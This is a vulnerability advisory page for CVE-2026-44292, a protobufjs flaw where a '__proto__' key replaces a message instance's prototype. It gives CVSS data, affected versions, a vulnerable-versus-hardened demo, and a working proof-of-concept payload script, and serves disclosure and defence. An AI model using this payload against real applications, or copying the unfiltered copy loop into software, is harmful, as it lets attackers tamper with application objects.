Security Vulnerability Report
CVE-2026-44292 CVSS 5.3 MEDIUM

Published: 2026-05-13 16:16:56
Last Modified: 2026-05-13 20:58:33

Description

protobufjs compiles protobuf definitions into JavaScript (JS) functions. Prior to 7.5.6 and 8.0.2, protobufjs generated message constructors copied enumerable properties from a provided properties object without filtering the __proto__ key. If an application constructed a message from an attacker-controlled plain object, an own enumerable __proto__ property could alter the prototype of that individual message instance. This vulnerability is fixed in 7.5.6 and 8.0.2.

Scope of the weakness (classified as CWE-1321 in the record below): only the prototype of the message instance built from the attacker's object is replaced; Object.prototype and other objects are not modified, consistent with the low integrity impact in the CVSS vector below. A practical consequence is that the affected instance inherits attacker-chosen fields and loses the generated message methods (for example toJSON) that normally come from its original prototype.
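The following stand-alone model of the bug is an added example and is not protobufjs' own code: it reconstructs the kind of copy loop the advisory describes (copying every own enumerable key of the properties object onto `this`) and places it beside a hardened variant that skips the `__proto__` key, as the fixed releases are described as doing. The constructor names, the `build`/`demo` helpers and the JSON sample are assumptions made for illustration. It runs offline with no dependency on protobufjs.

```javascript
// Added example: model of the vulnerable generated-constructor copy loop described
// in the advisory (reconstructed, not protobufjs' own code) beside a hardened one.

// Vulnerable pattern: copies every own enumerable key, including "__proto__".
// Assigning this["__proto__"] reaches the __proto__ setter on Object.prototype and
// replaces the prototype of THIS instance only.
function VulnerableMessage(properties) {
  if (properties) {
    for (const key of Object.keys(properties)) {
      if (properties[key] != null) this[key] = properties[key];
    }
  }
}
VulnerableMessage.prototype.toJSON = function () {
  return { name: this.name, age: this.age };
};

// Hardened pattern: the "__proto__" key is ignored, so the prototype stays intact.
function HardenedMessage(properties) {
  if (properties) {
    for (const key of Object.keys(properties)) {
      if (key === "__proto__") continue;
      if (properties[key] != null) this[key] = properties[key];
    }
  }
}
HardenedMessage.prototype.toJSON = VulnerableMessage.prototype.toJSON;

// Constructed sample of attacker-controlled input. JSON.parse yields an OWN
// enumerable "__proto__" property; an object literal written with a __proto__
// key would instead set the literal's prototype and never appear in Object.keys.
const UNTRUSTED_JSON = '{"name":"attacker","age":25,"__proto__":{"isAdmin":true}}';

// Build a message with the given constructor and report what happened to it.
function build(Ctor, json) {
  const msg = new Ctor(JSON.parse(json));
  return {
    isAdmin: msg.isAdmin === true,                              // inherited from injected object?
    keptPrototype: Object.getPrototypeOf(msg) === Ctor.prototype,
    hasToJSON: typeof msg.toJSON === "function",                // methods lost if prototype swapped
    globalPolluted: ({}).isAdmin === true,                      // Object.prototype is never touched
  };
}

function demo() {
  return {
    vulnerable: build(VulnerableMessage, UNTRUSTED_JSON),
    hardened: build(HardenedMessage, UNTRUSTED_JSON),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Running it shows the vulnerable instance inheriting `isAdmin` and losing `toJSON` while `globalPolluted` stays false for both constructors, which is the per-instance scope the description states. The same key filter belongs on every code path that copies keys from untrusted objects, not only the constructor.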

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:protobufjs_project:protobufjs:*:*:*:*:*:node.js:*:* - VULNERABLE
protobufjs < 7.5.6
cpe:2.3:a:protobufjs_project:protobufjs:*:*:*:*:*:node.js:*:* - VULNERABLE
protobufjs >= 8.0.0, < 8.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// This PoC demonstrates CVE-2026-44292 in protobufjs < 7.5.6 / 8.0.0 <= v < 8.0.2:
// an own enumerable __proto__ key in the properties object replaces the prototype
// of the constructed message instance (not Object.prototype).
// Prerequisite: npm install protobufjs at an affected version (before 7.5.6, or 8.0.0 up to 8.0.1)
const protobuf = require("protobufjs");

// 1. Define a simple protobuf message type
const root = protobuf.parse("message User { string name = 1; int32 age = 2; }").root;
const UserType = root.lookupType("User");

// 2. Attacker-controlled payload containing an own enumerable __proto__ key.
//    It is built with JSON.parse on purpose: an object literal written as
//    { "__proto__": {...} } sets the literal's own prototype instead of creating
//    a __proto__ property, so the vulnerable Object.keys copy loop would never see it.
const maliciousPayload = JSON.parse(
  '{"name":"attacker","age":25,"__proto__":{"isAdmin":true}}'
);

// 3. Create the message instance using the vulnerable library
console.log("[*] Creating message from malicious payload...");
const userMessage = UserType.create(maliciousPayload);

// 4. Verify the effect on this instance: its prototype is now the injected object,
//    so it inherits isAdmin and has lost the generated message methods.
const untouched = {};
if (userMessage.isAdmin === true &&
    Object.getPrototypeOf(userMessage) !== UserType.ctor.prototype) {
  console.log("[+] VULNERABILITY CONFIRMED: instance prototype replaced by attacker object");
  console.log("    userMessage.isAdmin:", userMessage.isAdmin);
  console.log("    typeof userMessage.toJSON:", typeof userMessage.toJSON); // no longer a function
  console.log("    Object.prototype polluted?", untouched.isAdmin === true); // false: per-instance only
} else {
  console.log("[-] Target appears patched or not vulnerable.");
}

References

https://github.com/protobufjs/protobuf.js/security/advisories/GHSA-fx83-v9x8-x52w (Vendor Advisory, Mitigation)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-44292",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-13T16:16:56.123",
    "lastModified": "2026-05-13T20:58:32.597",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "protobufjs compiles protobuf definitions into JavaScript (JS) functions. Prior to 7.5.6 and 8.0.2, protobufjs generated message constructors copied enumerable properties from a provided properties object without filtering the __proto__ key. If an application constructed a message from an attacker-controlled plain object, an own enumerable __proto__ property could alter the prototype of that individual message instance. This vulnerability is fixed in 7.5.6 and 8.0.2."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-1321"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:protobufjs_project:protobufjs:*:*:*:*:*:node.js:*:*",
                "versionEndExcluding": "7.5.6",
                "matchCriteriaId": "BC190A12-59A1-4DEF-A65D-E4216ED5B807"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:protobufjs_project:protobufjs:*:*:*:*:*:node.js:*:*",
                "versionStartIncluding": "8.0.0",
                "versionEndExcluding": "8.0.2",
                "matchCriteriaId": "734292AA-F3B2-4E3E-9FA2-0EBA7AB0BB45"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/protobufjs/protobuf.js/security/advisories/GHSA-fx83-v9x8-x52w",
        "source": "[email protected]",
        "tags": [
          "Vendor Advisory",
          "Mitigation"
        ]
      }
    ]
  }
}